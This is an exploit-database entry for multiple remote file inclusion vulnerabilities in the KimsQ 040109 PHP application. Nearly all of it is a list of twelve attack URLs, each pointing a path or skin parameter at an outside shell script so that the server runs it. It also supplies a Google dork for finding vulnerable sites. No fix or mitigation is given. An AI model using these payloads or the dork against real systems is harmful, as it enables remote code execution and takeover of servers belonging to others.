KimsQ 040109 Multiple Remote File Include Vulnerability

2010-03-30T00:00:00
ID 1337DAY-ID-11528
Type zdt
Reporter Mat
Modified 2010-03-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================================
KimsQ 040109 Multiple Remote File Include Vulnerability
=======================================================

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
KimsQ 040109 Multiple Remote File Include Vulnerability
Script: http://kimsq.googlecode.com/files/kimsq_v040109.zip
Author: mat
Mail: [email protected]
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
 
//------------------------------------------------------------------+
 
http://[target]/[path]/_sys/_ext/module/chat/default/q/user.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/contentsbox/default/admin/config.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/counter/default/admin/referer.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/info.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/log.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.gallery.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.profile.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/survey/default/_admin.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_blog/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_board/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_gallery/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_webzine/comment.php?bbs[skin]=http://[shellscript]
 
//------------------------------------------------------------------+
 
Google Dork: "kims Q - Administrator Login Mode"
 
Greetings: All Hackerz



#  0day.today [2018-03-14]  #